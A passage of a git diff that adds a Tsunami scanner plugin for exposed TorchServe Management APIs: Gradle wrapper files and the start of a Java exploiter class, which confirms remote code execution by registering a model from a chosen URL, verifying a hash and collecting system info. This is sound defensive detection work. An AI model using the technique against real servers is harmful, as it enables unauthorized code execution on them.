zA^Qca)(xnqw6x>XFhV6ku9r$E>bWNrVH9fum0?4s?Rn2LG{Vm_+QJHse6xa%nzQ?k zKug4PW~#Gtb;#5+9!QBgyB@q=sk9=$S{4T>wjFICStOM?__fr+Kei1 z3j~xPqW;W@YkiUM;HngG!;>@AITg}vAE`M2Pj9Irl4w1fo4w<|Bu!%rh%a(Ai^Zhi zs92>v5;@Y(Zi#RI*ua*h`d_7;byQSa*v9E{2x$<-_=5Z<7{%)}4XExANcz@rK69T0x3%H<@frW>RA8^swA+^a(FxK| zFl3LD*ImHN=XDUkrRhp6RY5$rQ{bRgSO*(vEHYV)3Mo6Jy3puiLmU&g82p{qr0F?ohmbz)f2r{X2|T2 z$4fdQ=>0BeKbiVM!e-lIIs8wVTuC_m7}y4A_%ikI;Wm5$9j(^Y z(cD%U%k)X>_>9~t8;pGzL6L-fmQO@K; zo&vQzMlgY95;1BSkngY)e{`n0!NfVgf}2mB3t}D9@*N;FQ{HZ3Pb%BK6;5#-O|WI( zb6h@qTLU~AbVW#_6?c!?Dj65Now7*pU{h!1+eCV^KCuPAGs28~3k@ueL5+u|Z-7}t z9|lskE`4B7W8wMs@xJa{#bsCGDFoRSNSnmNYB&U7 zVGKWe%+kFB6kb)e;TyHfqtU6~fRg)f|>=5(N36)0+C z`hv65J<$B}WUc!wFAb^QtY31yNleq4dzmG`1wHTj=c*=hay9iD071Hc?oYoUk|M*_ zU1GihAMBsM@5rUJ(qS?9ZYJ6@{bNqJ`2Mr+5#hKf?doa?F|+^IR!8lq9)wS3tF_9n zW_?hm)G(M+MYb?V9YoX^_mu5h-LP^TL^!Q9Z7|@sO(rg_4+@=PdI)WL(B7`!K^ND- z-uIuVDCVEdH_C@c71YGYT^_Scf_dhB8Z2Xy6vGtBSlYud9vggOqv^L~F{BraSE_t} zIkP+Hp2&nH^-MNEs}^`oMLy11`PQW$T|K(`Bu*(f@)mv1-qY(_YG&J2M2<7k;;RK~ zL{Fqj9yCz8(S{}@c)S!65aF<=&eLI{hAMErCx&>i7OeDN>okvegO87OaG{Jmi<|}D zaT@b|0X{d@OIJ7zvT>r+eTzgLq~|Dpu)Z&db-P4z*`M$UL51lf>FLlq6rfG)%doyp z)3kk_YIM!03eQ8Vu_2fg{+osaEJPtJ-s36R+5_AEG12`NG)IQ#TF9c@$99%0iye+ zUzZ57=m2)$D(5Nx!n)=5Au&O0BBgwxIBaeI(mro$#&UGCr<;C{UjJVAbVi%|+WP(a zL$U@TYCxJ=1{Z~}rnW;7UVb7+ZnzgmrogDxhjLGo>c~MiJAWs&&;AGg@%U?Y^0JhL ze(x6Z74JG6FlOFK(T}SXQfhr}RIFl@QXKnIcXYF)5|V~e-}suHILKT-k|<*~Ij|VF zC;t@=uj=hot~*!C68G8hTA%8SzOfETOXQ|3FSaIEjvBJp(A)7SWUi5!Eu#yWgY+;n zlm<$+UDou*V+246_o#V4kMdto8hF%%Lki#zPh}KYXmMf?hrN0;>Mv%`@{0Qn`Ujp) z=lZe+13>^Q!9zT);H<(#bIeRWz%#*}sgUX9P|9($kexOyKIOc`dLux}c$7It4u|Rl z6SSkY*V~g_B-hMPo_ak>>z@AVQ(_N)VY2kB3IZ0G(iDUYw+2d7W^~(Jq}KY=JnWS( z#rzEa&0uNhJ>QE8iiyz;n2H|SV#Og+wEZv=f2%1ELX!SX-(d3tEj$5$1}70Mp<&eI zCkfbByL7af=qQE@5vDVxx1}FSGt_a1DoE3SDI+G)mBAna)KBG4p8Epxl9QZ4BfdAN zFnF|Y(umr;gRgG6NLQ$?ZWgllEeeq~z^ZS7L?<(~O&$5|y)Al^iMKy}&W+eMm1W z7EMU)u^ke(A1#XCV>CZ71}P}0x)4wtHO8#JRG3MA-6g=`ZM!FcICCZ{IEw8Dm2&LQ z1|r)BUG^0GzI6f946RrBlfB1Vs)~8toZf~7)+G;pv&XiUO(%5bm)pl=p>nV^o*;&T z;}@oZSibzto$arQgfkp|z4Z($P>dTXE{4O=vY0!)kDO* zGF8a4wq#VaFpLfK!iELy@?-SeRrdz%F*}hjKcA*y@mj~VD3!it9lhRhX}5YOaR9$} z3mS%$2Be7{l(+MVx3 z(4?h;P!jnRmX9J9sYN#7i=iyj_5q7n#X(!cdqI2lnr8T$IfOW<_v`eB!d9xY1P=2q&WtOXY=D9QYteP)De?S4}FK6#6Ma z=E*V+#s8>L;8aVroK^6iKo=MH{4yEZ_>N-N z`(|;aOATba1^asjxlILk<4}f~`39dBFlxj>Dw(hMYKPO3EEt1@S`1lxFNM+J@uB7T zZ8WKjz7HF1-5&2=l=fqF-*@>n5J}jIxdDwpT?oKM3s8Nr`x8JnN-kCE?~aM1H!hAE z%%w(3kHfGwMnMmNj(SU(w42OrC-euI>Dsjk&jz3ts}WHqmMpzQ3vZrsXrZ|}+MHA7 z068obeXZTsO*6RS@o3x80E4ok``rV^Y3hr&C1;|ZZ0|*EKO`$lECUYG2gVFtUTw)R z4Um<0ZzlON`zTdvVdL#KFoMFQX*a5wM0Czp%wTtfK4Sjs)P**RW&?lP$(<}q%r68Z zS53Y!d@&~ne9O)A^tNrXHhXBkj~$8j%pT1%%mypa9AW5E&s9)rjF4@O3ytH{0z6riz|@< zB~UPh*wRFg2^7EbQrHf0y?E~dHlkOxof_a?M{LqQ^C!i2dawHTPYUE=X@2(3<=OOxs8qn_(y>pU>u^}3y&df{JarR0@VJn0f+U%UiF=$Wyq zQvnVHESil@d|8&R<%}uidGh7@u^(%?$#|&J$pvFC-n8&A>utA=n3#)yMkz+qnG3wd zP7xCnF|$9Dif@N~L)Vde3hW8W!UY0BgT2v(wzp;tlLmyk2%N|0jfG$%<;A&IVrOI< z!L)o>j>;dFaqA3pL}b-Je(bB@VJ4%!JeX@3x!i{yIeIso^=n?fDX`3bU=eG7sTc%g%ye8$v8P@yKE^XD=NYxTb zbf!Mk=h|otpqjFaA-vs5YOF-*GwWPc7VbaOW&stlANnCN8iftFMMrUdYNJ_Bnn5Vt zxfz@Ah|+4&P;reZxp;MmEI7C|FOv8NKUm8njF7Wb6Gi7DeODLl&G~}G4be&*Hi0Qw z5}77vL0P+7-B%UL@3n1&JPxW^d@vVwp?u#gVcJqY9#@-3X{ok#UfW3<1fb%FT`|)V~ggq z(3AUoUS-;7)^hCjdT0Kf{i}h)mBg4qhtHHBti=~h^n^OTH5U*XMgDLIR@sre`AaB$ zg)IGBET_4??m@cx&c~bA80O7B8CHR7(LX7%HThkeC*@vi{-pL%e)yXp!B2InafbDF zjPXf1mko3h59{lT6EEbxKO1Z5GF71)WwowO6kY|6tjSVSWdQ}NsK2x{>i|MKZK8%Q zfu&_0D;CO-Jg0#YmyfctyJ!mRJp)e#@O0mYdp|8x;G1%OZQ3Q847YWTyy|%^cpA;m zze0(5p{tMu^lDkpe?HynyO?a1$_LJl2L&mpeKu%8YvgRNr=%2z${%WThHG=vrWY@4 zsA`OP#O&)TetZ>s%h!=+CE15lOOls&nvC~$Qz0Ph7tHiP;O$i|eDwpT{cp>+)0-|; zY$|bB+Gbel>5aRN3>c0x)4U=|X+z+{ zn*_p*EQoquRL+=+p;=lm`d71&1NqBz&_ph)MXu(Nv6&XE7(RsS)^MGj5Q?Fwude-(sq zjJ>aOq!7!EN>@(fK7EE#;i_BGvli`5U;r!YA{JRodLBc6-`n8K+Fjgwb%sX;j=qHQ z7&Tr!)!{HXoO<2BQrV9Sw?JRaLXV8HrsNevvnf>Y-6|{T!pYLl7jp$-nEE z#X!4G4L#K0qG_4Z;Cj6=;b|Be$hi4JvMH!-voxqx^@8cXp`B??eFBz2lLD8RRaRGh zn7kUfy!YV~p(R|p7iC1Rdgt$_24i0cd-S8HpG|`@my70g^y`gu%#Tf_L21-k?sRRZHK&at(*ED0P8iw{7?R$9~OF$Ko;Iu5)ur5<->x!m93Eb zFYpIx60s=Wxxw=`$aS-O&dCO_9?b1yKiPCQmSQb>T)963`*U+Ydj5kI(B(B?HNP8r z*bfSBpSu)w(Z3j7HQoRjUG(+d=IaE~tv}y14zHHs|0UcN52fT8V_<@2ep_ee{QgZG zmgp8iv4V{k;~8@I%M3<#B;2R>Ef(Gg_cQM7%}0s*^)SK6!Ym+~P^58*wnwV1BW@eG z4sZLqsUvBbFsr#8u7S1r4teQ;t)Y@jnn_m5jS$CsW1um!p&PqAcc8!zyiXHVta9QC zY~wCwCF0U%xiQPD_INKtTb;A|Zf29(mu9NI;E zc-e>*1%(LSXB`g}kd`#}O;veb<(sk~RWL|f3ljxCnEZDdNSTDV6#Td({6l&y4IjKF z^}lIUq*ZUqgTPumD)RrCN{M^jhY>E~1pn|KOZ5((%F)G|*ZQ|r4zIbrEiV%42hJV8 z3xS)=!X1+=olbdGJ=yZil?oXLct8FM{(6ikLL3E%=q#O6(H$p~gQu6T8N!plf!96| z&Q3=`L~>U0zZh;z(pGR2^S^{#PrPxTRHD1RQOON&f)Siaf`GLj#UOk&(|@0?zm;Sx ztsGt8=29-MZs5CSf1l1jNFtNt5rFNZxJPvkNu~2}7*9468TWm>nN9TP&^!;J{-h)_ z7WsHH9|F%I`Pb!>KAS3jQWKfGivTVkMJLO-HUGM_a4UQ_%RgL6WZvrW+Z4ujZn;y@ zz9$=oO!7qVTaQAA^BhX&ZxS*|5dj803M=k&2%QrXda`-Q#IoZL6E(g+tN!6CA!CP* zCpWtCujIea)ENl0liwVfj)Nc<9mV%+e@=d`haoZ*`B7+PNjEbXBkv=B+Pi^~L#EO$D$ZqTiD8f<5$eyb54-(=3 zh)6i8i|jp(@OnRrY5B8t|LFXFQVQ895n*P16cEKTrT*~yLH6Z4e*bZ5otpRDri&+A zfNbK1D5@O=sm`fN=WzWyse!za5n%^+6dHPGX#8DyIK>?9qyX}2XvBWVqbP%%D)7$= z=#$WulZlZR<{m#gU7lwqK4WS1Ne$#_P{b17qe$~UOXCl>5b|6WVh;5vVnR<%d+Lnp z$uEmML38}U4vaW8>shm6CzB(Wei3s#NAWE3)a2)z@i{4jTn;;aQS)O@l{rUM`J@K& l00vQ5JBs~;vo!vr%%-k{2_Fq1Mn4QF81S)AQ99zk{{c4yR+0b! literal 0 HcmV?d00001 diff --git a/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.properties b/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..1af9e0930 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-8.5-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/doyensec/detectors/rce/torchserve/gradlew b/doyensec/detectors/rce/torchserve/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/gradlew @@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/doyensec/detectors/rce/torchserve/gradlew.bat b/doyensec/detectors/rce/torchserve/gradlew.bat new file mode 100644 index 000000000..93e3f59f1 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/gradlew.bat @@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/doyensec/detectors/rce/torchserve/settings.gradle b/doyensec/detectors/rce/torchserve/settings.gradle new file mode 100644 index 000000000..ef90a3ace --- /dev/null +++ b/doyensec/detectors/rce/torchserve/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'torchserve_management_api' diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java new file mode 100644 index 000000000..28ceb5af1 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java @@ -0,0 +1,900 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.base.Preconditions.checkNotNull; + +import com.google.common.flogger.GoogleLogger; +import com.google.gson.Gson; +import com.google.gson.GsonBuilder; +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import com.google.gson.JsonParseException; +import com.google.gson.JsonParser; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpMethod; +import com.google.tsunami.common.net.http.HttpRequest; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import java.io.IOException; +import java.security.MessageDigest; +import java.time.Instant; +import java.util.ArrayList; +import java.util.List; +import javax.inject.Inject; +import okhttp3.HttpUrl; +import org.checkerframework.checker.nullness.qual.Nullable; + +public class TorchServeExploiter { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private final HttpClient httpClient; + public final Details details; + private final PayloadGenerator payloadGenerator; + private final TorchServeManagementAPIExploiterWebServer webServer; + private Payload payload; + public TorchServeRandomUtils randomUtils; + + enum ExploitationMode { + // Just detect the TorchServe Management API, do not attempt to exploit. + BASIC, + // Provide Tsunami callback server's URL as a model source, consider any callback as a + // confirmation. + SSRF, + // Provide a static URL as a model source, verify code execution directly. + STATIC, + // Serve a model locally, verify code execution directly. + LOCAL + } + + public class Details { + // Effective settings (merged from config file and cli args) + public ExploitationMode exploitationMode; + public String staticUrl; + public String localBindHost; + public int localBindPort; + public String localAccessibleUrl; + + // Data collected during the exploit + public List models; + public boolean hashVerification = false; + public boolean callbackVerification = false; + public String systemInfo; + public boolean cleanupFailed = false; + public String modelName; + public String targetUrl; + public String exploitUrl; + public String messageLogged; + + static final String LOG_MESSAGE = + "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo" + + " for details. No malicious activity intended. Timestamp: %s"; + + /** + * Constructor for Details class. Initializes the details with configuration and command line + * arguments. + * + * @param config Configuration object. + * @param args Command line arguments. + */ + public Details(TorchServeManagementApiConfig config, TorchServeManagementApiArgs args) { + initializeExploitationMode(args, config); + initializeUrls(args, config); + validateParameters(); + } + + private void initializeExploitationMode( + TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) { + String mode = args.exploitationMode != null ? args.exploitationMode : config.exploitationMode; + if (mode.equals("auto")) { + this.exploitationMode = + payloadGenerator.isCallbackServerEnabled() + ? ExploitationMode.SSRF + : ExploitationMode.BASIC; + } else { + this.exploitationMode = ExploitationMode.valueOf(mode.toUpperCase()); + } + } + + private void initializeUrls( + TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) { + this.staticUrl = args.staticUrl != null ? args.staticUrl : config.staticUrl; + this.localBindHost = args.localBindHost != null ? args.localBindHost : config.localBindHost; + this.localBindPort = args.localBindPort != 0 ? args.localBindPort : config.localBindPort; + this.localAccessibleUrl = + args.localAccessibleUrl != null ? args.localAccessibleUrl : config.localAccessibleUrl; + } + + private void validateParameters() { + if (this.exploitationMode == ExploitationMode.STATIC && this.staticUrl == null) { + throw new IllegalArgumentException( + "Static mode requires --torchserve-management-api-model-static-url"); + } + + if (this.exploitationMode == ExploitationMode.LOCAL) { + if (this.localBindHost == null + || this.localBindPort == 0 + || this.localAccessibleUrl == null) { + throw new IllegalArgumentException( + "Local mode requires --torchserve-management-api-local-bind-host," + + " --torchserve-management-api-local-bind-port and" + + " --torchserve-management-api-local-accessible-url"); + } + } + } + + public Severity getSeverity() { + return isVerified() ? Severity.CRITICAL : Severity.LOW; + } + + public boolean isVerified() { + return this.hashVerification || this.callbackVerification; + } + + public String generateDescription() { + StringBuilder description = + new StringBuilder("An exposed TorchServe management API was detected on the target. "); + description.append( + "TorchServe is a model server for PyTorch models. The management API allows adding new" + + " models to the server which by design can be used to execute arbitrary code on the" + + " target.\n"); + description.append( + "This exposure poses a significant security risk as it could allow unauthorized users to" + + " run arbitrary code on the server."); + + switch (this.exploitationMode) { + case SSRF: + description + .append( + "The exploit was confirmed by receiving a callback from the target while adding a" + + " new model with the following details: ") + .append(" - Name: ") + .append(this.modelName) + .append(" - URL: ") + .append(this.exploitUrl); + break; + case STATIC: + case LOCAL: + description + .append( + "The exploit was confirmed by adding a new model to the target with the following" + + " details: ") + .append(" - Name: ") + .append(this.modelName) + .append(" - URL: ") + .append(this.exploitUrl); + break; + default: + break; + } + + return description.toString(); + } + + public String generateAdditionalDetails() { + StringBuilder additionalDetails = new StringBuilder(); + + switch (this.exploitationMode) { + case BASIC: + additionalDetails.append( + "Callback verification is not enabled in Tsunami configuration, so the exploit" + + " could not be confirmed and only the Management API detection is reported." + + " It is recommended to enable callback verification for more conclusive" + + " vulnerability assessment."); + if (this.models != null && !this.models.isEmpty()) { + additionalDetails + .append("\nModels found on the target:\n - ") + .append(String.join("\n - ", this.models)); + } + break; + case SSRF: + additionalDetails.append( + "A callback was received from the target while adding a new model, confirming the" + + " exploit. Code execution was not verified directly. For a more direct" + + " confirmation of remote code execution, consider using STATIC or LOCAL" + + " modes."); + if (this.models != null && !this.models.isEmpty()) { + additionalDetails + .append("\nModels found on the target:\n - ") + .append(String.join("\n - ", this.models)); + } + break; + case STATIC: + case LOCAL: + additionalDetails + .append( + "Code execution was verified by adding a new model to the target and performing" + + " following actions:\n") + .append( + " - Calculating a hash of a random value and comparing it to the value returned" + + " by the target (" + + (this.hashVerification ? "Success" : "Failure") + + ")\n"); + + if (payloadGenerator.isCallbackServerEnabled()) { + additionalDetails.append( + " - Sending a callback to the target and confirming that the callback URL was" + + " received (" + + (this.callbackVerification ? "Success" : "Failure") + + ")\n"); + } + + additionalDetails + .append("System info collected from the target:\n") + .append(prettyPrintJson(this.systemInfo)) + .append("\n\n") + .append("The following log entry was generated on the target:\n\n") + .append(this.messageLogged); + if (this.models != null && !this.models.isEmpty()) { + additionalDetails + .append("\n\nModels found on the target:\n - ") + .append(String.join("\n - ", this.models)); + } + break; + } + + return additionalDetails.toString(); + } + } + + @Inject + public TorchServeExploiter( + TorchServeManagementApiConfig config, + TorchServeManagementApiArgs args, + HttpClient httpClient, + PayloadGenerator payloadGenerator, + TorchServeManagementAPIExploiterWebServer webServer, + TorchServeRandomUtils randomUtils) { + this.httpClient = + checkNotNull(httpClient, "httpClient must not be null") + .modify() + .setFollowRedirects(false) + .build(); + this.payloadGenerator = checkNotNull(payloadGenerator, "payloadGenerator must not be null"); + this.details = + new Details( + checkNotNull(config, "config must not be null"), + checkNotNull(args, "args must not be null")); + this.webServer = checkNotNull(webServer, "webServer must not be null"); + this.randomUtils = checkNotNull(randomUtils, "randomUtils must not be null"); + } + + /** + * Verifies if the target service is vulnerable to TorchServe Management API RCE. + * + * @param service The network service to be checked. + * @return Details of the vulnerability if found, null otherwise. + */ + public @Nullable Details isServiceVulnerable(NetworkService service) { + HttpUrl targetUrl = buildTargetUrl(service); + + try { + return isServiceVulnerable(targetUrl); + } catch (IOException e) { + logger.atWarning().withCause(e).log( + "Failed to check if service is vulnerable due to network error"); + } catch (Exception e) { + logger.atSevere().withCause(e).log( + "Unexpected error occurred while checking service vulnerability"); + } finally { + cleanupExploit(); + } + return null; + } + + private @Nullable Details isServiceVulnerable(HttpUrl targetUrl) throws IOException { + if (!isTorchServe(targetUrl)) return null; + logger.atInfo().log("Target matches TorchServe Management API fingerprint"); + + // Scrape the list of models from the target + String modelName = getModelName(targetUrl); + + String url; + switch (this.details.exploitationMode) { + case BASIC: + 